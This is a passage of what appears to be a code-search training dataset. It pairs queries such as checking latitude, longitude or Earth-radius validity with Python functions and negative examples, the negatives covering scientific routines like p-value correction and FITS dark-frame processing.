"def process_anneal(superdark_list, masterdark, mode): #LP added mode\n # LP added checks\n print('\\tReplacing pixels in superdarks with values from masterdark {}'.format(masterdark))\n print('\\tReplacing pixels in superdarks with values from masterdark {}'.format(masterdark))\n\n # Replace good pixels in superdarks\n for superdark in superdark_list:\n\n # Open the masterdark and the superdark\n masterdark_hdulist = fits.open(masterdark, mode='readonly')\n superdark_hdulist = fits.open(superdark, mode='update')\n\n # Find the non-good pixels in the superdark\n bad_pixels_ext3 = np.where(superdark_hdulist[3].data != 0)\n bad_pixels_ext6 = np.where(superdark_hdulist[6].data != 0)\n\n # Assume the new data takes the form of the masterdark\n new_data_ext1 = masterdark_hdulist[1].data.astype(np.float32)\n new_data_ext2 = masterdark_hdulist[2].data.astype(np.float32)\n new_data_ext4 = masterdark_hdulist[4].data.astype(np.float32)\n new_data_ext5 = masterdark_hdulist[5].data.astype(np.float32)\n\n # For non-good pixels, replace the values with that of the superdark\n new_data_ext1[bad_pixels_ext3] = superdark_hdulist[1].data[bad_pixels_ext3].astype(np.float32)\n new_data_ext2[bad_pixels_ext3] = superdark_hdulist[2].data[bad_pixels_ext3].astype(np.float32)\n new_data_ext4[bad_pixels_ext6] = superdark_hdulist[4].data[bad_pixels_ext6].astype(np.float32)\n new_data_ext5[bad_pixels_ext6] = superdark_hdulist[5].data[bad_pixels_ext6].astype(np.float32)\n superdark_hdulist[1].data = new_data_ext1\n superdark_hdulist[2].data = new_data_ext2\n superdark_hdulist[4].data = new_data_ext4\n superdark_hdulist[5].data = new_data_ext5\n\n # Save the changes\n superdark_hdulist.close()",
"def correct_pvalues_for_multiple_testing(pvalues, correction_type = \"Benjamini-Hochberg\"):\n pvalues = np.array(pvalues) \n n = float(pvalues.shape[0]) \n qvalues = np.empty(pvalues.shape[0])\n if correction_type == \"Bonferroni\": \n qvalues = n * pvalues\n elif correction_type == \"Bonferroni-Holm\": \n values = [ (pvalue, i) for i, pvalue in enumerate(pvalues) ] \n values.sort()\n for rank, vals in enumerate(values): \n pvalue, i = vals\n qvalues[i] = (n-rank) * pvalue \n elif correction_type == \"Benjamini-Hochberg\": \n values = [ (pvalue, i) for i, pvalue in enumerate(pvalues) ] \n values.sort()\n values.reverse() \n new_values = []\n for i, vals in enumerate(values): \n rank = n - i\n pvalue, index = vals \n new_values.append((n/rank) * pvalue) \n for i in range(0, int(n)-1): \n if new_values[i] < new_values[i+1]: \n new_values[i+1] = new_values[i] \n for i, vals in enumerate(values):\n pvalue, index = vals\n qvalues[index] = new_values[i] \n return qvalues.tolist()",
"def correct_pvalues_for_multiple_testing(pvalues, correction_type=\"Benjamini-Hochberg\"):\n\n pvalues = array(pvalues)\n n = float(pvalues.shape[0])\n new_pvalues = empty(n)\n if correction_type == \"Bonferroni\":\n new_pvalues = n * pvalues\n elif correction_type == \"Bonferroni-Holm\":\n values = [(pvalue, i) for i, pvalue in enumerate(pvalues)]\n values.sort()\n for rank, vals in enumerate(values):\n pvalue, i = vals\n new_pvalues[i] = (n - rank) * pvalue\n elif correction_type == \"Benjamini-Hochberg\":\n values = [(pvalue, i) for i, pvalue in enumerate(pvalues)]\n values.sort()\n values.reverse()\n new_values = []\n for i, vals in enumerate(values):\n rank = n - i\n pvalue, index = vals\n new_values.append((n / rank) * pvalue)\n for i in range(0, int(n) - 1):\n if new_values[i] < new_values[i + 1]:\n new_values[i + 1] = new_values[i]\n for i, vals in enumerate(values):\n pvalue, index = vals\n new_pvalues[index] = new_values[i]\n return new_pvalues",
"def correct_pvalues_for_multiple_testing(pvalues, correction_type=\"Benjamini-Hochberg\"):\r\n from numpy import array, empty\r\n pvalues = array(pvalues)\r\n n = pvalues.shape[0]\r\n new_pvalues = empty(n)\r\n if correction_type == \"Bonferroni\":\r\n new_pvalues = n * pvalues\r\n elif correction_type == \"Bonferroni-Holm\":\r\n values = [ (pvalue, i) for i, pvalue in enumerate(pvalues) ]\r\n values.sort()\r\n for rank, vals in enumerate(values):\r\n pvalue, i = vals\r\n new_pvalues[i] = (n-rank) * pvalue\r\n elif correction_type == \"Benjamini-Hochberg\":\r\n values = [ (pvalue, i) for i, pvalue in enumerate(pvalues) ]\r\n values.sort()\r\n values.reverse()\r\n new_values = []\r\n for i, vals in enumerate(values):\r\n rank = n - i\r\n pvalue, index = vals\r\n new_values.append((n/rank) * pvalue)\r\n for i in range(0, int(n)-1):\r\n if new_values[i] < new_values[i+1]:\r\n new_values[i+1] = new_values[i]\r\n for i, vals in enumerate(values):\r\n pvalue, index = vals\r\n new_pvalues[index] = new_values[i]\r\n return new_pvalues",
"def inference(factorList, queryVariables, orderedListOfHiddenVariables, evidenceList):\n \"\"\" This function should restrict the factors in factorList according to the evidence in evidenceList.\n Next, it should sumout the hidden variables from the product of the factors in factorList. \n The variables should be summed out in the order given in orderedListOfHiddenVariables. \n Finally, the answer should be normalized when a probability distribution that sums up to 1 is desired. \"\"\"\n for evidence in evidenceList:\n for idx, factor in enumerate(factorList):\n shapeLst = list(factor.shape)\n if shapeLst[evidence['var']] == 2:\n res = restrict(factor, evidence['var'], evidence['value'])\n factorList[idx] = res\n #print 'Restriction Complete: ' + str(evidence['var'])\n #print factorList\n \n for hidVarIdx, hidVar in enumerate(orderedListOfHiddenVariables):\n factorLstToMultiply = []\n factorLstIndexLst = []\n \n for idx, factor in enumerate(factorList):\n shapeLst = list(factor.shape)\n if shapeLst[hidVar] == 2:\n factorLstToMultiply.append(factor)\n factorLstIndexLst.append(idx)\n \n factorLstIndexLst.sort(reverse=True)\n \n for factorLstIndex in factorLstIndexLst:\n factorList.pop(factorLstIndex)\n \n #print 'factor List'\n #print factorList\n \n if len(factorLstToMultiply) != 0:\n sum = factorLstToMultiply.pop()\n for idx, factor in enumerate(factorLstToMultiply):\n sum = multiply(sum, factor)\n sum = sumout (sum, hidVar)\n #print 'multiply + sum-out var ' + str(hidVar)\n #print sum\n factorList.append(sum)\n \n #print 'debug'\n #print factorList\n \n # The remaining factors refer only to the query variables Q, take their product and normalize to produce P(Q)\n sum = factorList.pop()\n for idx, factor in enumerate(factorList):\n sum = multiply(sum, factor)\n \n return normalize(sum)",
"def call_pls(chrom,xdata,factors,mask,data):\n scores = []\n \n for i in range(chrom.shape[0]):\n if _remdup(chrom[i]) == 0:\n #extract vars from xdata\n slice = scipy.take(xdata,chrom[i,:].tolist(),1)\n collate = 0\n for nF in range(mask.shape[1]):\n #split in to training and test\n try:\n pls_output = pls(slice,data['class'][:,0][:,nA],mask[:,nF].tolist(),factors)\n \n if min(pls_output['rmsec']) <= min(pls_output['rmsepc']):\n collate += pls_output['RMSEPC']\n else:\n collate += 10.0**5\n except:\n collate = 0\n \n if collate != 0:\n scores.append(collate/float(mask.shape[1]))\n else:\n scores.append(10.0**5)\n else:\n scores.append(10.0**5)\n \n return scipy.asarray(scores)[:,nA]",
"def learn_from_maps(self, data):\n # Remove any map with only zero values:\n self.maps_ = self.maps_[self.maps_.ptp(axis=1) != 0]\n if not len(self.maps_):\n # All maps are zero\n self.cov_ = np.array([[]], dtype=np.float)\n return\n # Flip sign to always have positive features\n for map in self.maps_:\n mask = map > 0\n if map[mask].sum() > - map[np.logical_not(mask)].sum():\n map *= -1\n\n # Relearn U, V to have the right scaling on U\n residuals = None\n #residuals = 0\n U = list()\n for d in data:\n u, this_residuals = self.learn_time_series(d)\n U.append(u)\n #this_residuals = np.sqrt(np.mean(this_residuals))\n #residuals += this_residuals\n if residuals is None:\n residuals = this_residuals\n else:\n residuals += this_residuals\n residuals /= len(data)\n #self.residuals_ = np.atleast_1d(residuals)\n self.residuals_ = residuals # = np.sqrt(residuals)\n self.residuals_.fill(np.sqrt(self.residuals_.mean()))\n del this_residuals, u, d\n U = np.concatenate(U, axis=1)\n n_samples = U.shape[1]\n S = np.sqrt((U ** 2).sum(axis=1) / n_samples)\n U /= S[:, np.newaxis]\n self.maps_ *= S[:, np.newaxis]\n self.cov_ = 1. / n_samples * np.dot(U, U.T)\n #self.cov_ = np.eye(n_maps)",
"def add_factors(factors): \n global p_factors\n for (d,c) in factors:\n add(d,c)",
"def setFactors(self, number):\n self.number = number\n length = len(self.primes)\n p = self.primes[:self.closestPrimeIndex(self.primes, self.number**0.5) + 1]\n\n self.facts = cuda_factor(self.number, p)\n\n c = 1\n for fact in self.facts:\n c = c * fact\n\n if c != self.number:\n num = self.number / c\n for fact in self.facts:\n while num % fact == 0:\n num = num / fact\n\n if num != 1:\n self.facts.append(num)",
"def correct_data(forecast):\n for key, meta in vs.metvars.items():\n for suffix in ['_mean', '_lower_percentile', '_upper_percentile']:\n key_suffix = f'{key}{suffix}'\n if meta['correction'] == 'ratio':\n forecast.loc[~forecast[f'bias_{key}_mean'].isna(), key_suffix] /= forecast.loc[~forecast[f'bias_{key}_mean'].isna(), f'bias_{key}_mean']\n elif meta['correction'] == 'difference':\n forecast.loc[~forecast[f'bias_{key}_mean'].isna(), key_suffix] -= forecast.loc[~forecast[f'bias_{key}_mean'].isna(), f'bias_{key}_mean']\n forecast[key_suffix] = forecast[key_suffix].round(1)",
"def call_dfa(chrom,xdata,DFs,mask,data):\n Y = []\n for x in range(len(chrom)):\n if _remdup(chrom[x]) == 0:\n #extract vars from xdata\n slice = meancent(_slice(xdata,chrom[x]))\n collate = 0\n for nF in range(mask.shape[1]):\n #split in to training and test\n tr_slice,cv_slice,ts_slice,tr_grp,cv_grp,ts_grp,tr_nm,cv_nm,ts_nm=_split(slice,\n data['class'][:,0],mask[:,nF].tolist(),data['label'])\n \n try:\n u,v,eigs,dummy = cva(tr_slice,tr_grp,DFs)\n projU = scipy.dot(cv_slice,v)\n u = scipy.concatenate((u,projU),0)\n group2 = scipy.concatenate((tr_grp,cv_grp),0)\n \n B,W = _BW(u,group2)\n L,A = scipy.linalg.eig(B,W)\n order = _flip(scipy.argsort(scipy.reshape(L.real,(len(L),))))\n Ls = _flip(scipy.sort(L.real))\n eigval = Ls[0:DFs]\n \n collate += sum(eigval)\n except:\n continue\n \n if collate != 0:\n Y.append(float(mask.shape[1])/collate)\n else:\n Y.append(10.0**5)\n else:\n Y.append(10.0**5)\n \n return scipy.array(Y)[:,nA]",
"def update(self, data):\n for hypo in self.values():\n like = self.likelihood(data, hypo)\n self.mult(hypo, like)\n\n return self.normalize()",
"def normalize_data(self, data, scale_factor, norm_factors):\n norm_data = []\n # set to 1 for NewOrder transactions\n data['neworder_count'] = np.where(data['transactiontype']\n == self.NEW_ORDER_ID, 1, 0)\n # cumulative sum of NewOrder transactions\n data['neworder_cum_sum'] = data['neworder_count'].cumsum()\n\n norm_vector = pd.Series(norm_factors,\n index=range(self.OLAP_QUERY_LOWER_ID,\n self.OLAP_QUERY_HIGHER_ID + 1),\n name=\"normfactors\")\n\n norm_data = data.join(norm_vector, \"transactiontype\")\n norm_data['normfactors'].fillna(0, inplace=True)\n norm_data['norm_latency'] = norm_data['latency'] / \\\n (scale_factor + norm_data['normfactors'] *\n norm_data['neworder_cum_sum'])\n return norm_data",
"def map_EM_2_LDC(EM_list, mapping_rule, threshold=-1):\n counter = {}\n for em in EM_list: # each EMTerm\n mapped_dict = mapping_rule[em]\n for ldc, weight in mapped_dict.items(): # each ldc label corr. EMTerm\n if ldc not in counter:\n counter[ldc] = weight\n else:\n counter[ldc] += weight\n\n if threshold == -1:\n counter = list(counter.items())\n counter.sort(key=lambda x: x[1], reverse=True)\n return counter\n else:\n ret = []\n for ldc, cnt in counter.items():\n if cnt >= threshold:\n ret.append(ldc)\n return ret"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Check if latitude is valid
|
def verifyLatitude(lat:float) -> bool:
return (-90 <= lat <= 90)
|
[
"def check_latitude(lat):\n if lat < -90 or lat > 90:\n raise ValueError(\"Latitude (%f) out of range [-90 - 90]\" % lat)",
"def invalidLatitude(latitude):\n\ttry:\n\t\tlatitude = float(latitude)\n\texcept ValueError:\n\t\treturn True\n\n\tif (-90 <= latitude <= 90):\n\t\treturn False\n\telse:\n\t\treturn True",
"def validate_lat_in_range(value):\n\t_validate_in_range(value, -90, 90)",
"def assert_is_lat(val):\n assert type(val) is float or type(val) is int, \"Value must be a number\"\n if val < -90.0 or val > 90.0:\n raise ValueError(\"Latitude value must be between -90 and 90\")",
"def check_latitude(self, ds):\n ret_val = []\n\n recommended = 'degrees_north'\n acceptable = ['degree_north', 'degree_N', 'degrees_N', 'degreeN', 'degreesN']\n \n for k,v in ds.dataset.variables.iteritems():\n if k == 'latitude' or getattr(v, 'standard_name', None) == 'latitude':\n results = self._coord_has_units(k, 'latitude', v, recommended, acceptable)\n ret_val.extend(results)\n\n\n return ret_val",
"def verifyLatLon(lat:float, lon:float) -> bool:\n return verifyLatitude(lat) and verifyLongitude(lon)",
"def test_validate_coordinates():\n lat_less_than = (-91.00, 1.0)\n lat_more_than = (91.00, 1.0)\n lon_less_than = (1.00, -181.0)\n lon_more_than = (1.00, 181.0)\n\n assert validate_coordinates(lat_less_than) == [lat_less_than, \"latitude less than -90\"]\n assert validate_coordinates(lat_more_than) == [lat_more_than, \"latitude greater than 90\"]\n assert validate_coordinates(lon_less_than) == [lon_less_than, \"longitude less than -180\"]\n assert validate_coordinates(lon_more_than) == [lon_more_than, \"longitude greater than 180\"]",
"def coordinate_length_ok(latitude, longitude):\n if len(str(latitude)) > 6 and len(str(longitude)) > 6:\n return True\n return False",
"def has_latitude(self):\n xpath = [\"StopPoints\", \"StopPoint\", \"Place\", \"Location\"]\n locations = self.find_anywhere(xpath)\n\n if len(locations) == 0:\n return False\n\n try:\n locations[0].get_elements(\"Latitude\")\n return True\n except NoElement:\n return False",
"def verifyLongitude(lon:float) -> bool:\n return (-180 <= lon <= 180)",
"def test_geographical_coordinates_with_valid_address(self):\n valid_address = \"576 Natoma St., San Francisco CA\"\n geo_coords = GeographicalCoordinates(valid_address)\n\n self.assertNotEqual(geo_coords.latitude, 0.0)\n self.assertNotEqual(geo_coords.longitude, 0.0)\n self.assertEqual(geo_coords.status, 'OK')",
"def is_valid_geocode(geocodigo):\n if len(str(geocodigo)) != 7:\n raise ValueError('Geocode must have 7 digtis')\n dig = int(str(geocodigo)[-1])\n if dig == calculate_digit(geocodigo):\n return True\n else:\n return False",
"def valid(self):\n if self.error == \"None\" and \\\n self.coord[0] > 0 and self.coord[1] > 0 and \\\n self.coord[0] < 1 and self.coord[1] < 1:\n return True\n else:\n return False",
"def check_longitude(lon):\n if lon < -180 or lon > 180:\n raise ValueError(\"Longitude (%f) out of range [-180, 180]\" % lon)",
"def validate_gps_string(gps_string, map_settings):\r\n gps_coords = gps_string.split(\",\")\r\n if len(gps_coords) == 2:\r\n lat = gps_coords[0]\r\n long = gps_coords[1]\r\n try:\r\n lat_float = float(lat)\r\n long_float = float(long)\r\n except ValueError:\r\n return \"\"\r\n if ((lat >= map_settings['latitude-valid-limits'][1] or lat <= map_settings['latitude-valid-limits'][0]) and # E.g. \"55.50\", \"51.40\"\r\n (long >= map_settings['longitude-valid-limits'][0] or long <= map_settings['longitude-valid-limits'][1])): # E.g. \"-10.70\", \"-5.40\"\r\n return gps_string\r\n return \"\"",
"def isValidCoord(passed_coord):\n coordRegex = re.compile(r'(-)?\\b(\\d?)(\\d?)(\\d?)\\b(\\.|,)\\b(\\d?)(\\d?)(\\d?)(\\d?)(\\d?)\\b(, |; )(-)?\\b(\\d?)(\\d?)(\\d?)\\b(\\.|,)\\b(\\d?)(\\d?)(\\d?)(\\d?)(\\d?)\\b')\n coordTest = coordRegex.search(passed_coord)\n if coordTest is None:\n print(\"You did not enter a proper coordinate. \")\n return False\n else:\n if passed_coord == coordTest.group():\n print(\"You entered a proper coord. \")\n return True\n else:\n print(\"You did not enter a proper coord. \")\n return False",
"def ST_IsValid(geos):\n return arctern.ST_IsValid(geos)",
"def is_valid_point(map_grid, point):\n x = point[0]\n y = point[1]\n width = map_grid.info.width\n height = map_grid.info.height\n return 0 <= x < width and 0 <= y < height",
"def test_single_point_lat_long(self):\n\n data = np.ones((16, 16), dtype=np.float32)\n data[7, 7] = 0\n cube = set_up_variable_cube(data, spatial_grid=\"latlon\",)\n\n msg = \"Unable to convert from\"\n radius = 6000.0\n with self.assertRaisesRegex(ValueError, msg):\n GeneratePercentilesFromANeighbourhood(radius).process(cube)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Check if longitude is valid
|
def verifyLongitude(lon:float) -> bool:
return (-180 <= lon <= 180)
|
[
"def check_longitude(lon):\n if lon < -180 or lon > 180:\n raise ValueError(\"Longitude (%f) out of range [-180, 180]\" % lon)",
"def check_longitude(self, ds):\n ret_val = []\n\n recommended = 'degrees_east'\n acceptable = ['degree_east', 'degree_E', 'degrees_E', 'degreeE', 'degreesE']\n \n for k,v in ds.dataset.variables.iteritems():\n if k == 'longitude' or getattr(v, 'standard_name', None) == 'longitude':\n results = self._coord_has_units(k, 'longitude', v, recommended, acceptable)\n ret_val.extend(results)\n\n\n return ret_val",
"def verifyLatLon(lat:float, lon:float) -> bool:\n return verifyLatitude(lat) and verifyLongitude(lon)",
"def assert_is_lon(val):\n assert type(val) is float or type(val) is int, \"Value must be a number\"\n if val < -180.0 or val > 180.0:\n raise ValueError(\"Longitude value must be between -180 and 180\")",
"def coordinate_length_ok(latitude, longitude):\n if len(str(latitude)) > 6 and len(str(longitude)) > 6:\n return True\n return False",
"def test_bad_longitude(self):\n self.assertRaises(ValidationError, create_area, latitude=Decimal(value=\"1\"), longitude=Decimal(value=\"181\"),\n radius=5, fid=self.fid)",
"def validate_lat_in_range(value):\n\t_validate_in_range(value, -90, 90)",
"def test_validate_coordinates():\n lat_less_than = (-91.00, 1.0)\n lat_more_than = (91.00, 1.0)\n lon_less_than = (1.00, -181.0)\n lon_more_than = (1.00, 181.0)\n\n assert validate_coordinates(lat_less_than) == [lat_less_than, \"latitude less than -90\"]\n assert validate_coordinates(lat_more_than) == [lat_more_than, \"latitude greater than 90\"]\n assert validate_coordinates(lon_less_than) == [lon_less_than, \"longitude less than -180\"]\n assert validate_coordinates(lon_more_than) == [lon_more_than, \"longitude greater than 180\"]",
"def validate_lng_in_range(value):\n\t_validate_in_range(value, -180, 180)",
"def verifyLatitude(lat:float) -> bool:\n return (-90 <= lat <= 90)",
"def test_lon(result):\n\n assert -180 <= result.json()['lon'] <= 180, \\\n \"Value of the 'lon' field is not in a given range.\"",
"def locn_is_latlong():\n s = read_command(\"g.region\", flags='pu')\n kv = parse_key_val(s, ':')\n if kv['projection'].split(' ')[0] == '3':\n return True\n else:\n return False",
"def _check_area(self):\n (lat_max, lon_min, lat_min, lon_max) = self.area\n if not (\n -90 <= lat_max <= 90\n and -90 <= lat_min <= 90\n and -180 <= lon_min <= 180\n and -180 <= lon_max <= 180\n and lat_max > lat_min\n and lon_max != lon_min\n ):\n raise ValueError(\n \"Provide coordinates as lat_max lon_min lat_min lon_max. \"\n \"Latitude must be in range -180,+180 and \"\n \"longitude must be in range -90,+90.\"\n )",
"def test_invalid_longitude(self):\n self.assertRaises(\n ValueError,\n self.wda.append_weather_data,\n 21.0068,\n -190.64,\n date(2012, 1, 6))",
"def test_geographical_coordinates_with_valid_address(self):\n valid_address = \"576 Natoma St., San Francisco CA\"\n geo_coords = GeographicalCoordinates(valid_address)\n\n self.assertNotEqual(geo_coords.latitude, 0.0)\n self.assertNotEqual(geo_coords.longitude, 0.0)\n self.assertEqual(geo_coords.status, 'OK')",
"def validate_gps_string(gps_string, map_settings):\r\n gps_coords = gps_string.split(\",\")\r\n if len(gps_coords) == 2:\r\n lat = gps_coords[0]\r\n long = gps_coords[1]\r\n try:\r\n lat_float = float(lat)\r\n long_float = float(long)\r\n except ValueError:\r\n return \"\"\r\n if ((lat >= map_settings['latitude-valid-limits'][1] or lat <= map_settings['latitude-valid-limits'][0]) and # E.g. \"55.50\", \"51.40\"\r\n (long >= map_settings['longitude-valid-limits'][0] or long <= map_settings['longitude-valid-limits'][1])): # E.g. \"-10.70\", \"-5.40\"\r\n return gps_string\r\n return \"\"",
"def check_latitude(lat):\n if lat < -90 or lat > 90:\n raise ValueError(\"Latitude (%f) out of range [-90 - 90]\" % lat)",
"def verify_location(coordinates):\n\n coordinates.columns = coordinates.columns.str.lower()\n\n # Verify that all air quality locations are (roughly) within Oregon\n for ind in coordinates.index:\n\n lat = coordinates.at[ind, 'latitude']\n long = coordinates.at[ind, 'longitude']\n\n if (40 <= lat <= 47) and (-125 <= long <= -115):\n pass\n else:\n warnings.warn(f\"Coordinate not in Oregon at index: {ind}\")",
"def invalidLatitude(latitude):\n\ttry:\n\t\tlatitude = float(latitude)\n\texcept ValueError:\n\t\treturn True\n\n\tif (-90 <= latitude <= 90):\n\t\treturn False\n\telse:\n\t\treturn True"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Check if lat/lon are valid
|
def verifyLatLon(lat:float, lon:float) -> bool:
return verifyLatitude(lat) and verifyLongitude(lon)
|
[
"def test_validate_coordinates():\n lat_less_than = (-91.00, 1.0)\n lat_more_than = (91.00, 1.0)\n lon_less_than = (1.00, -181.0)\n lon_more_than = (1.00, 181.0)\n\n assert validate_coordinates(lat_less_than) == [lat_less_than, \"latitude less than -90\"]\n assert validate_coordinates(lat_more_than) == [lat_more_than, \"latitude greater than 90\"]\n assert validate_coordinates(lon_less_than) == [lon_less_than, \"longitude less than -180\"]\n assert validate_coordinates(lon_more_than) == [lon_more_than, \"longitude greater than 180\"]",
"def valid(self):\n if self.error == \"None\" and \\\n self.coord[0] > 0 and self.coord[1] > 0 and \\\n self.coord[0] < 1 and self.coord[1] < 1:\n return True\n else:\n return False",
"def _check_area(self):\n (lat_max, lon_min, lat_min, lon_max) = self.area\n if not (\n -90 <= lat_max <= 90\n and -90 <= lat_min <= 90\n and -180 <= lon_min <= 180\n and -180 <= lon_max <= 180\n and lat_max > lat_min\n and lon_max != lon_min\n ):\n raise ValueError(\n \"Provide coordinates as lat_max lon_min lat_min lon_max. \"\n \"Latitude must be in range -180,+180 and \"\n \"longitude must be in range -90,+90.\"\n )",
"def verifyLatitude(lat:float) -> bool:\n return (-90 <= lat <= 90)",
"def check_valid_coords(xy, allow: bool, warn: bool) -> None:\n if np.isnan(xy).any() or np.isinf(xy).any():\n if not allow:\n raise ValueError(\"invalid coordinates\", xy)\n elif warn:\n warnings.warn(f\"invalid coordinates: {xy}\")",
"def is_valid_point(map_grid, point):\n x = point[0]\n y = point[1]\n width = map_grid.info.width\n height = map_grid.info.height\n return 0 <= x < width and 0 <= y < height",
"def coordinate_length_ok(latitude, longitude):\n if len(str(latitude)) > 6 and len(str(longitude)) > 6:\n return True\n return False",
"def test_get_coords_list_valid(self):\n coupon = COUPON_FACTORY.create_coupon()\n coords_list = coupon.get_location_coords_list()\n self.assertAlmostEqual(int(float(coords_list[0][0])), -73)\n self.assertAlmostEqual(int(float(coords_list[0][1])), 41)",
"def test_geographical_coordinates_with_valid_address(self):\n valid_address = \"576 Natoma St., San Francisco CA\"\n geo_coords = GeographicalCoordinates(valid_address)\n\n self.assertNotEqual(geo_coords.latitude, 0.0)\n self.assertNotEqual(geo_coords.longitude, 0.0)\n self.assertEqual(geo_coords.status, 'OK')",
"def coordinate_checker(self, a, b):\n self.assertAlmostEqual(a[\"lat\"], b[\"lat\"], 3)\n self.assertAlmostEqual(a[\"lng\"], b[\"lng\"], 3)",
"def verify_location(coordinates):\n\n coordinates.columns = coordinates.columns.str.lower()\n\n # Verify that all air quality locations are (roughly) within Oregon\n for ind in coordinates.index:\n\n lat = coordinates.at[ind, 'latitude']\n long = coordinates.at[ind, 'longitude']\n\n if (40 <= lat <= 47) and (-125 <= long <= -115):\n pass\n else:\n warnings.warn(f\"Coordinate not in Oregon at index: {ind}\")",
"def verifyLongitude(lon:float) -> bool:\n return (-180 <= lon <= 180)",
"def check_longitude(lon):\n if lon < -180 or lon > 180:\n raise ValueError(\"Longitude (%f) out of range [-180, 180]\" % lon)",
"def check_latitude(lat):\n if lat < -90 or lat > 90:\n raise ValueError(\"Latitude (%f) out of range [-90 - 90]\" % lat)",
"def validate_lat_in_range(value):\n\t_validate_in_range(value, -90, 90)",
"def ST_IsValid(geos):\n return arctern.ST_IsValid(geos)",
"def test_single_point_lat_long(self):\n\n data = np.ones((16, 16), dtype=np.float32)\n data[7, 7] = 0\n cube = set_up_variable_cube(data, spatial_grid=\"latlon\",)\n\n msg = \"Unable to convert from\"\n radius = 6000.0\n with self.assertRaisesRegex(ValueError, msg):\n GeneratePercentilesFromANeighbourhood(radius).process(cube)",
"def isValidCoord(passed_coord):\n coordRegex = re.compile(r'(-)?\\b(\\d?)(\\d?)(\\d?)\\b(\\.|,)\\b(\\d?)(\\d?)(\\d?)(\\d?)(\\d?)\\b(, |; )(-)?\\b(\\d?)(\\d?)(\\d?)\\b(\\.|,)\\b(\\d?)(\\d?)(\\d?)(\\d?)(\\d?)\\b')\n coordTest = coordRegex.search(passed_coord)\n if coordTest is None:\n print(\"You did not enter a proper coordinate. \")\n return False\n else:\n if passed_coord == coordTest.group():\n print(\"You entered a proper coord. \")\n return True\n else:\n print(\"You did not enter a proper coord. \")\n return False",
"def isCoordValid(coordinate):\n return coordinate in allCoords"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Check if valid radius for Earth in kilometers
|
def verifyRadius(radius:float) -> bool:
return (0 < radius < 6371)
|
[
"def check_range(lat_user, lon_user, lat_test, lon_test, radius):\n distance = haversine(lon_user,lat_user, lon_test, lat_test)\n if distance <= radius:\n return True\n else:\n return False",
"def checkWithinRITRadius(latitude,longitude):\n radius_to_check=2 #2 miles radius\n RIT_center=(-77.679955,43.08611833333333)\n if geopy.distance.distance((RIT_center),(latitude,longitude)).miles<=radius_to_check:\n return True\n else:\n return False",
"def test_stations_within_radius(): # Add test for stations_within_radius function\n stations = build_station_list() # Create list of stations for testing\n centre = (53, -1) # Put the centre (roughly) in the middle of the UK\n # (according to the data from DEFRA, the extent of the stations is between\n # Lat 49.9-55.8 and Long -6.2 - 2.1)\n r = 1500 # Set a large radius to guarantee encompassing all of the stations\n output = stations_within_radius(stations, centre, r) # Use the test function\n\n if len(stations) == 0: # Ensure that there is some data to be tested\n # from the source\n raise ValueError(\"Source list gives no data\")\n else:\n assert len(output) > 0 # Ensure that it outputs some data\n assert type(output[0]) == MonitoringStation # Ensure that it is outputting a list of names\n # in MonitoringStation format\n assert len(output) == len(stations) # Make sure that it includes all of the stations\n # (as r and centre are set so that it should encompass all of the stations)",
"def test_get_radius_from_request(self):\n test_query_dict = {'location': 'West Hollywood, CA, United States', 'open': 'true', 'radius': '10'}\n radius = get_radius_from_request(test_query_dict)\n assert radius == 10*1609.344, \"radius is actually {}\".format(radius)\n del test_query_dict['radius']\n radius = get_radius_from_request(test_query_dict)\n assert radius == 8000, \"radius is actually {}\".format(radius)",
"def check_ellipsoid(pt, abc):\n\n\treturn np.sum(np.square(pt) / np.square(abc)) < 1",
"def test_radius_cap(self):\n test_query_dict = {'location': 'West Hollywood, CA, United States', 'open': 'true', 'radius': '50'}\n radius = get_radius_from_request(test_query_dict)\n assert radius == 50000, \"radius is actually {}\".format(radius)\n del test_query_dict['radius']\n radius = get_radius_from_request(test_query_dict)\n assert radius == 8000, \"radius is actually {}\".format(radius)",
"def distance_to_earth(self):\n if self.distance_module is not None:\n return 10 ** ((self.distance_module + 5) / 5)\n elif self.parallax is not None:\n return 1/self.parallax\n else:\n raise ValueError(\"There is no way to find out the distance to earth for this location.\")",
"def coordinate_length_ok(latitude, longitude):\n if len(str(latitude)) > 6 and len(str(longitude)) > 6:\n return True\n return False",
"def radius_east(self, lat):\n return self.a / sqrt(1. - self.e2 * sin(lat)**2)",
"def test_unused_locality_near_stops_150_meters():\n assert unused()",
"def test_radius(self):\n dictList = get_dict_list()\n postcodelatlng = [50.827974, -4.543799]\n radius = 0\n actualOutput = filterData(dictList, postcodelatlng, radius)\n expectedOutput = []\n self.assertEqual(actualOutput, expectedOutput)",
"def in_circle(radius):\n return lambda z: z.real ** 2 + z.imag ** 2 < radius ** 2",
"def ellipsoidcurvradius(ellipsoid, lat_gd, azimuth):\n errtext = 'Invalid excentricity value in ellipsoid model.'\n inrange(ellipsoid[1], 0, 1, exclude='upper', text=errtext)\n\n aterm = 1 - ellipsoid[1]**2 * sind(lat_gd)**2\n rn = 1 / np.sqrt(aterm)\n rm = (1 - ellipsoid[1]**2) * (rn / aterm)\n e0 = (ellipsoid[0] / (cosd(azimuth)**2.0 / rm + sind(azimuth)**2.0 / rn))\n e1 = 0\n\n return e0, e1",
"def verifyLatitude(lat:float) -> bool:\n return (-90 <= lat <= 90)",
"def test_single_point_lat_long(self):\n\n data = np.ones((16, 16), dtype=np.float32)\n data[7, 7] = 0\n cube = set_up_variable_cube(data, spatial_grid=\"latlon\",)\n\n msg = \"Unable to convert from\"\n radius = 6000.0\n with self.assertRaisesRegex(ValueError, msg):\n GeneratePercentilesFromANeighbourhood(radius).process(cube)",
"def check_radius(func):\n def inner_function(rad):\n if rad <=0:\n raise ValueError('Radius cannot be negative')\n return func(rad)\n return inner_function",
